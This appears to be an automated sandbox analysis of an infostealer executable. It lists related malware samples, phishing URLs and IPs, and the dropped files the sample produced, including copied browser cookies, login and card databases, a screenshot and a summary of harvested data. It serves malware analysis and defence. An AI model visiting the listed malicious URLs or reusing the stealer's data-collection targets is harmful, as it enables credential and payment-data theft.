                                file.exeGet hashmaliciousPython Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, Stealc, VidarBrowse
                                • 149.154.167.220
                                QUOTATION_JULQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                • 149.154.167.220

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                TELEGRAMRUWfKynArKjH.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, RedLineBrowse
                                • 149.154.167.220
                                https://bming.cl/readm.html?colors=bWljaGFlbC5jaHVAbGNhdHRlcnRvbi5jb20=Get hashmaliciousUnknownBrowse
                                • 149.154.167.220
                                https://join-telegram.apl-my.com/virallbn/Get hashmaliciousUnknownBrowse
                                • 149.154.167.99
                                lHqcAkPNu8.exeGet hashmaliciousXWormBrowse
                                • 149.154.167.220
                                file.exeGet hashmaliciousClipboard HijackerBrowse
                                • 149.154.167.220
                                https://kaslasa.ru/Get hashmaliciousUnknownBrowse
                                • 149.154.167.99
                                https://telegarm-com.icu/Get hashmaliciousTelegram PhisherBrowse
                                • 149.154.167.99
                                Nursultan Alpha Client.exeGet hashmaliciousDCRat, XWormBrowse
                                • 149.154.167.220
                                Easy Anti-Cheat Analyzer.exeGet hashmaliciousDCRat, XWormBrowse
                                • 149.154.167.220
                                encrypthub_steal.ps1Get hashmaliciousUnknownBrowse
                                • 149.154.167.220
                                HETZNER-ASDEWfKynArKjH.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, RedLineBrowse
                                • 195.201.57.90
                                1d686b05f745875e28939abe357baedd169b59f5a0d88.exeGet hashmaliciousQuasarBrowse
                                • 195.201.57.90
                                file.exeGet hashmaliciousVidarBrowse
                                • 5.75.212.60
                                SecuriteInfo.com.Win32.Evo-gen.21074.1738.exeGet hashmaliciousSmokeLoaderBrowse
                                • 188.40.141.211
                                mek_n_bat.batGet hashmaliciousUnknownBrowse
                                • 78.47.143.65
                                file.exeGet hashmaliciousVidarBrowse
                                • 5.75.212.60
                                1lKbb2hF7fYToopfpmEvlyRN.exeGet hashmaliciousLummaC, VidarBrowse
                                • 5.75.212.60
                                file.exeGet hashmaliciousVidarBrowse
                                • 5.75.212.60
                                https://www.formajo.com/bestbuy/fxc/cmVhbGVtYWlsQGppbW15am9obi5jb20=Get hashmaliciousHTMLPhisherBrowse
                                • 88.99.142.215
                                IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                                • 5.75.212.60

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                3b5074b1b5d032e5620f69f9f700ff0eWfKynArKjH.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, RedLineBrowse
                                • 149.154.167.220
                                http://pub-a29070233cb54ef393c1ddea471f903c.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                • 149.154.167.220
                                https://gdhddyyyu-yfdrfs-f48b55.ingress-earth.ewp.live/wp-content/plugins/ddrxmis/pages/region.phpGet hashmaliciousUnknownBrowse
                                • 149.154.167.220
                                https://metamaskuh.azurewebsites.net/Get hashmaliciousUnknownBrowse
                                • 149.154.167.220
                                http://pub-63ee9e97e9eb46d78c12a9137fdc4d90.r2.dev/invoice.htmGet hashmaliciousHTMLPhisherBrowse
                                • 149.154.167.220
                                http://pub-58a4baf41c124648bdc4fe772188accd.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                • 149.154.167.220
                                http://pub-40cb77b4a6d84294bfa2db6a96f70ff7.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                • 149.154.167.220
                                http://www.capitalonebnks.com/Get hashmaliciousUnknownBrowse
                                • 149.154.167.220
                                http://pub-8198ef94712a43e5a05e0ea8720214fd.r2.dev/oblivionauth%5D.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 149.154.167.220
                                http://pub-d8b66a320d00484cb05b1813b55f7739.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 149.154.167.220

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):1.1940658735648508
                                Encrypted:false
                                SSDEEP:3:Nlllul3nqth:NllUa
                                MD5:851531B4FD612B0BC7891B3F401A478F
                                SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:@...e.................................&..............@..........

                                C:\Users\user\AppData\Local\Temp\Cookies

                                Download File
                                Process:C:\Users\user\Desktop\765iYbgWn9.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                Category:dropped
                                Size (bytes):20480
                                Entropy (8bit):0.6732424250451717
                                Encrypted:false
                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\CreditCardData

                                Download File
                                Process:C:\Users\user\Desktop\765iYbgWn9.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                Category:dropped
                                Size (bytes):196608
                                Entropy (8bit):1.121297215059106
                                Encrypted:false
                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Cookies\Chrome_Default_Network.txt

                                Download File
                                Process:C:\Users\user\Desktop\765iYbgWn9.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):286
                                Entropy (8bit):5.7588025104123
                                Encrypted:false
                                SSDEEP:6:PkU6WtDxbuQ0cKGWGcsGG1NOpFw+5uQ+Cy8HfyUhEqXfL6vRpAn:cU99EQ07BGcW1NOpFwUuQLHaU9WvHA
                                MD5:07691E9F2983932701060D0FC5588075
                                SHA1:878CA50CCD13F2DDA9C55B158B1D41F17636AA5A
                                SHA-256:7F831E59CC96BDF3B1E0235B7D75201F2545F4F90DD43965E3B69B2FEFD9FD4E
                                SHA-512:399B1FBA58B2CE804CF988C0C8E123477B43D0C4F426BCF1DA389D5C59BE9D03B640454E60D89D51DE5087E5601CBF591779884678279925552D7B8BD8EC6461
                                Malicious:false
                                Reputation:low
                                Preview:.google.com.false./.true.13343492415760663.1P_JAR.2023-10-04-13...google.com.true./.true.13356711615760707.NID.511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4

                                C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\screen1.png

                                Download File
                                Process:C:\Users\user\Desktop\765iYbgWn9.exe
                                File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):871537
                                Entropy (8bit):7.514704598714351
                                Encrypted:false
                                SSDEEP:24576:CV53qeJntUG1huJkE1+aRbRakFLzNwIsD:0aAUuUJkca0LzaX
                                MD5:AA43214E4801C2C9253D5F68B0231B97
                                SHA1:4771334945A1589C57833402A07C4FC3B65C539F
                                SHA-256:D038F18DEECB9F377378920662C27925CD6FEE9BF53B44C992AB9558EB42884E
                                SHA-512:D211904CC780F2EF69846FC05D52DBEA0F89BDFBEB5618B9BA9F08070F6D7560A0037AD6D96295B277FEECD9D83D92BFA43CC584A73323801DD726B4CD7DE382
                                Malicious:false
                                Reputation:low
                                Preview:.PNG........IHDR................C..L8IDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6...".....I)..H""..L.$a..I.d&...$.R..m$!..d&..$$.....~...@)..`.&."...d..T..Ak.Z+.V.i...m.i"3). .....q..@...Mf..H"".L2..D...U2..D...m.q$....&.If.../"..$.2...6..$.(".Df..H....8.d&..@f.PJ.6..`...O..Af.0M.}.Ske.^s?..D....@D....IHB..If...R....ls?.R.Dk........d&...... "h.1...m2..IB..

                                C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\sensitive-files.zip

                                Download File
                                Process:C:\Users\user\Desktop\765iYbgWn9.exe
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):14970
                                Entropy (8bit):7.837007680406016
                                Encrypted:false
                                SSDEEP:384:yJx9yyyyytjnN8/WpHwbnVCUkWZJx9yyyyytjnN8/WpHwbnVCUkWwPYLNDWhizzU:GyByM2nnV2WPyByM2nnV2WLuR
                                MD5:5F9275C16D8ED763D29E2CC5B75E6B6C
                                SHA1:310D9B1006B17D4EDE2AB8E0749287A7F1F1DCC9
                                SHA-256:1425B5292C8380929470CB0C28A02876724D2201EE1938EFD9CDF891797CE227
                                SHA-512:4322E6CAC1608B4B8DD5A62F909A77E8B17C3618AF630D67A926C06BA72AAE9FC4BF451C3C825328FAC875B04E3EF9AD74B7C0395E221388660A80E89141914B
                                Malicious:false
                                Preview:PK.........;.X.-%U............IVHSHTCODI.pdf.SIv@!......YDq..?H.1!.8.L..h.mb!..daF..}..)...I..i.EP...8.&....d...+..(...;.X.rv\..;&.[gl.u......d'.....r..R0..o...... ....9).$%.....Z..~.^..q..*.C}....k..F..;z...q.\.vUKx6.wi.i.w!y..mw.6..dN..M...q2.Q#Z..^%.0%.XJ2FE..W:.y.;....;....@..-f(.#i1.s.S.n.Q..._SI..o.Z..*.a..3.)0.....Lo.c...-...*.......n;.V..[.../.O....DS.\j..o......0.\..YW....;.e^.U.f..?....(2...-.:.p.T:.....C.;....Ot...0..&..p..,@..wlG.unvS........oh...I.Q=..:fh..0.S..st`NR..b...]..J.D|.[9x...b...I.1..!..`..n...?N.{.m. ...65.}OPz..m..GV..s.8:....LVk..{B.a?.2..}...+.A.+........>.%....J....l..d.......1...u.O....@;L.UQ..w'OS..o...<.o............PK.........;.X1...............JDSOXXXWOA.docx.RGr@!..g&...bE.r...g..k.hG=..p..j.[.G(q.....2.me.T.]g..6..9......v..Zc1\.S.S1[.p.Ex.M.O..N.....A..4.iTP..u...0..4S....|.,.....^.sgv...u,....WF.fj..$<..'`.r\.F0.dN.H ...u7........tQ.f.f..i.p\.'%.y...S.....y.....:p6A.%EH......-./.^.s~..UB..C,.-6.=C9...53.

                                C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\user_info.txt

                                Download File
                                Process:C:\Users\user\Desktop\765iYbgWn9.exe
                                File Type:Unicode text, UTF-8 text, with CRLF, CR, LF line terminators
                                Category:dropped
                                Size (bytes):709
                                Entropy (8bit):5.345983040943533
                                Encrypted:false
                                SSDEEP:12:eM3lAQN3oi23w/7QQ8bjx6Y5rrJFolQM7NlVagBQM3aWflIHdAMij01mMXaBLSEW:eaNYv3w/7QxxVXHM7NlVage8lOAMijUP
                                MD5:B362356B204A8ECC14C12FAA4B9BBED5
                                SHA1:F65F5D37C4694609C6B80C8D074C6DD79482CE50
                                SHA-256:5ADDC95EF2A73F42515A44BAE378EB02291B5AB3B288EDC28CA76FB4CCE56FC6
                                SHA-512:2D82B85969794EE435B55E1822FF05BAFFBF6422C8F0E608EFF36B437787E10DDEE71EC1CABD7ABB505101A8B7ECA9BF8E723632EC546F3C410F49C01FB3D18C
                                Malicious:false
                                Preview:..- IP Info -....IP: 8.46.123.33..Country: United States..City: New York..Postal: 10000..ISP: Level - A3356..Timezone: -04:00....- PC Info -....Username: user..OS: Microsoft Windows 10 Pro..CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..GPU: EC6CD_O6G (1280, 1024)..HWID: 5229958482931895..Current Language: English (United States)..FileLocation: C:\Users\user\Desktop\765iYbgWn9.exe..Is Elevated: true....- Other Info -....Antivirus: .. - Windows Defender....- Log Info -.....Build:_____....Passwords: ....Cookies: . 2...Wallets: ....Files: . 20...Credit Cards: ....Servers FTP/SSH: ....Discord Tokens: .......Tagged URLs: ....Tagged Cookies: .......Tags Passwords: .....Tags Cookies:

                                C:\Users\user\AppData\Local\Temp\History

                                Download File
                                Process:C:\Users\user\Desktop\765iYbgWn9.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                Category:dropped
                                Size (bytes):155648
                                Entropy (8bit):0.5407252242845243
                                Encrypted:false
                                SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                MD5:7B955D976803304F2C0505431A0CF1CF
                                SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                Malicious:false
                                Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\Login Data

                                Download File
                                Process:C:\Users\user\Desktop\765iYbgWn9.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                Category:dropped
                                Size (bytes):51200
                                Entropy (8bit):0.8746135976761988
                                Encrypted:false
                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                Malicious:false
                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\Web Data

                                Download File
                                Process:C:\Users\user\Desktop\765iYbgWn9.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                Category:dropped
                                Size (bytes):196608
                                Entropy (8bit):1.121297215059106
                                Encrypted:false
                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                Malicious:false
                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_al4w5zup.1wd.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rkoz5bfs.ykr.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\out.zip

                                Download File
                                Process:C:\Users\user\Desktop\765iYbgWn9.exe
                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                Category:dropped
                                Size (bytes):890984
                                Entropy (8bit):7.528438168415787
                                Encrypted:false
                                SSDEEP:24576:fV53qeJntUG1huJkE1+aRbRakFLzNwIsz:DaAUuUJkca0Lzaf
                                MD5:91F4A89F04278F41437EDA0A9FE87C25
                                SHA1:96A995037874CC6FDA693711053262EE848F7F23
                                SHA-256:5097DE1D9FB350EDD940A4C9F5D57320DBBD6E36B14BAE6F40BE57F53F96822B
                                SHA-512:B8B55A625FBC54089E80A7C15D93475A8C79C0D34956D4833692CC8EC92CA08BB6FE8F2600A607246FA6524E8314E6C4C8C8B78F4C249098A7B7951CADF41FC1
                                Malicious:false
                                Preview:PK........";.X................Autofill/PK........";.X................Cookies/PK........";.X................CreditCards/PK........";.X................Downloads/PK........";.X................History/PK........";.X................Passwords/PK........";.X...qL..qL......screen1.png.PNG........IHDR................C..L8IDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6.

                                C:\Users\user\AppData\Local\Temp\sensitive-files.zip

                                Download File
                                Process:C:\Users\user\Desktop\765iYbgWn9.exe
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):14970
                                Entropy (8bit):7.837007680406016
                                Encrypted:false
                                SSDEEP:384:yJx9yyyyytjnN8/WpHwbnVCUkWZJx9yyyyytjnN8/WpHwbnVCUkWwPYLNDWhizzU:GyByM2nnV2WPyByM2nnV2WLuR
                                MD5:5F9275C16D8ED763D29E2CC5B75E6B6C
                                SHA1:310D9B1006B17D4EDE2AB8E0749287A7F1F1DCC9
                                SHA-256:1425B5292C8380929470CB0C28A02876724D2201EE1938EFD9CDF891797CE227
                                SHA-512:4322E6CAC1608B4B8DD5A62F909A77E8B17C3618AF630D67A926C06BA72AAE9FC4BF451C3C825328FAC875B04E3EF9AD74B7C0395E221388660A80E89141914B
                                Malicious:false
                                Preview:PK.........;.X.-%U............IVHSHTCODI.pdf.SIv@!......YDq..?H.1!.8.L..h.mb!..daF..}..)...I..i.EP...8.&....d...+..(...;.X.rv\..;&.[gl.u......d'.....r..R0..o...... ....9).$%.....Z..~.^..q..*.C}....k..F..;z...q.\.vUKx6.wi.i.w!y..mw.6..dN..M...q2.Q#Z..^%.0%.XJ2FE..W:.y.;....;....@..-f(.#i1.s.S.n.Q..._SI..o.Z..*.a..3.)0.....Lo.c...-...*.......n;.V..[.../.O....DS.\j..o......0.\..YW....;.e^.U.f..?....(2...-.:.p.T:.....C.;....Ot...0..&..p..,@..wlG.unvS........oh...I.Q=..:fh..0.S..st`NR..b...]..J.D|.[9x...b...I.1..!..`..n...?N.{.m. ...65.}OPz..m..GV..s.8:....LVk..{B.a?.2..}...+.A.+........>.%....J....l..d.......1...u.O....@;L.UQ..w'OS..o...<.o............PK.........;.X1...............JDSOXXXWOA.docx.RGr@!..g&...bE.r...g..k.hG=..p..j.[.G(q.....2.me.T.]g..6..9......v..Zc1\.S.S1[.p.Ex.M.O..N.....A..4.iTP..u...0..4S....|.,.....^.sgv...u,....WF.fj..$<..'`.r\.F0.dN.H ...u7........tQ.f.f..i.p\.'%.y...S.....y.....:p6A.%EH......-./.^.s~..UB..C,.-6.=C9...53.

                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

                                Download File
                                Process:C:\Users\user\Desktop\765iYbgWn9.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):32768
                                Entropy (8bit):0.017262956703125623
                                Encrypted:false
                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                Malicious:false
                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                Static File Info

                                General

                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                Entropy (8bit):6.398426891987362
                                TrID:
                                • Win64 Executable GUI (202006/5) 92.65%
                                • Win64 Executable (generic) (12005/4) 5.51%
                                • Generic Win/DOS Executable (2004/3) 0.92%
                                • DOS Executable Generic (2002/1) 0.92%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:765iYbgWn9.exe
                                File size:5'438'976 bytes
                                MD5:0534ab10184891cd61d262bfd79b7b4c
                                SHA1:a13d37959a92bc37f4d3c42eb53d77cc760f448a
                                SHA256:191272e200345dcb0a7a8c8c975a8b07847f07b9d9f0c3af472fdb88092aee0b
                                SHA512:381af090cc87f2f2b8583c28a164f8f2e978c2bdffe3161d37fa30e38c5e026b90ae5f45dd13f9ded8ee207e4694abf2a58256deb8986ec11d802b7578f6be9d
                                SSDEEP:49152:flhBWdxUM546QwStp9BLoQDbN46Nhz8kGAy9x2XdMP3Z+dlihVnp3qd38gT+c1m0:flXWhqntN46uPM3jwHYlDx7ILqTn
                                TLSH:69467B03FA9545EDC0AAC174875A9333EB32B84A0A24B79B5BD44A313F57F606F9C358
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z..R.f.R.f.R.f.[c..@.f...e.[.f...b._.f...c.z.f..ng.D.f..cg.P.f.R.g.w.f.F.b.H.f.R.f.X.f.F.d.S.f.RichR.f.................PE..d..

                                File Icon

                                Icon Hash:00928e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0x1403930f0
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x140000000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Time Stamp:0x66A3CC60 [Fri Jul 26 16:18:40 2024 UTC]
                                TLS Callbacks:0x4021ee90, 0x1
                                CLR (.Net) Version:
                                OS Version Major:6
                                OS Version Minor:0
                                File Version Major:6
                                File Version Minor:0
                                Subsystem Version Major:6
                                Subsystem Version Minor:0
                                Import Hash:94e6725f9edd6f43dcf6269a222aa3c5

                                Entrypoint Preview

                                Instruction
                                dec eax
                                sub esp, 28h
                                call 00007FDF45231FCCh
                                dec eax
                                add esp, 28h
                                jmp 00007FDF45231807h
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                nop word ptr [eax+eax+00000000h]
                                dec eax
                                sub esp, 10h
                                dec esp
                                mov dword ptr [esp], edx
                                dec esp
                                mov dword ptr [esp+08h], ebx
                                dec ebp
                                xor ebx, ebx
                                dec esp
                                lea edx, dword ptr [esp+18h]
                                dec esp
                                sub edx, eax
                                dec ebp
                                cmovb edx, ebx
                                dec esp
                                mov ebx, dword ptr [00000010h]
                                dec ebp
                                cmp edx, ebx
                                jnc 00007FDF452319A8h
                                inc cx
                                and edx, 8D4DF000h
                                wait
                                add al, dh

                                Rich Headers

                                Programming Language:
                                • [IMP] VS2008 SP1 build 30729

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x50bfd40x1cc.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x5170000x148e0.pdata
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x52c0000x80a4.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x4ff2100x54.rdata
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x4ff4000x28.rdata
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4ff0d00x140.rdata
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x3a60000x980.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
